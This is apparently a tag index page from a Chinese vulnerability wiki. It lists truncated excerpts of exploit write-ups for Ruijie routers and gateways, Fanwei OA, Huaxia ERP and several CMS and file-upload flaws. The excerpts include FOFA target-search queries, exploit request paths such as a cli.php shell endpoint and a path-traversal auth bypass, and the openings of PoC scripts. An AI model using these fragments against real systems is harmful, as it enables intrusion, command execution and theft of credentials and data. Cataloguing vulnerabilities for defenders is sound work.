云尚在线客服系统任意文件上传漏洞
PWNWIK.COM , FOFA body="cgwl.ico" 漏洞利用 访问 /index/index/home?visiter_id=&visiter_name=&avatar=&business_id=1& ...
标签:data
以下是与标签“data”相关联的文章
-
-
锐捷NBR 1300G路由器 越权CLI命令执行漏洞
免费、自由、人人可编辑的漏洞库--pwnwiki.com , Contents 1 FOFA 2 Request 3 POC 4 参考 FOFA title="锐捷网络 --NBR路由器--登录界面" Request POST /WEB_V ...
-
锐捷EG易网关 管理员账号密码泄露漏洞
免费、自由、人人可编辑的漏洞库--pwnwiki.com , 漏洞利用 发送以下请求: POST /login.php HTTP/1.1 Host: User-Agent: Go-http-client/1.1 Content-Length ...
-
锐捷EG易网关 cli.php 远程命令执行漏洞
免费、自由、人人可编辑的漏洞库 , 漏洞利用 发送以下请求: POST /cli.php?a=shell HTTP/1.1 Host: User-Agent: Go-http-client/1.1 Content-Length: 24 Co ...
-
华夏ERP授权绕过漏洞
免费、自由、人人可编辑的漏洞库 , POC python3 poc.py http://ip:port import sys,requests def main(ip): url = "{ip}/a.css/../user/getUserL ...
-
联软准入 任意文件上传漏洞
免费、自由、人人可编辑的漏洞库 , POC POST /uai/download/uploadfileToPath.htm HTTP/1.1 HOST: xxxxx ... ... ----------------------------- ...
-
狮子鱼CMS image upload.php 任意文件上传漏洞
免费、自由、人人可编辑的漏洞库--pwnwiki.com , FOFA "/seller.php?s=/Public/login" Request POST /Common/ckeditor/plugins/multiimg/dialogs ...
-
狂雨CMS后台数据泄漏漏洞
免费、自由、人人可编辑的漏洞库 , EXP # !/usr/bin/python3 # -*- coding:utf-8 -*- # author: Forthrglory import requests import time def g ...
-
泛微ecology OA数据库配置信息泄露/zh-hant
pwnwiki.com , 利用前提 /mobile/DBconfigReader.jsp存在未授权访问。 POC import base64 import requests import ast def req(url): headers ...
-
泛微ecology OA数据库配置信息泄露/zh-cn
pwnwiki.com , 利用前提 /mobile/DBconfigReader.jsp 存在未授权访问 POC import base64 import requests import ast def req(url): headers ...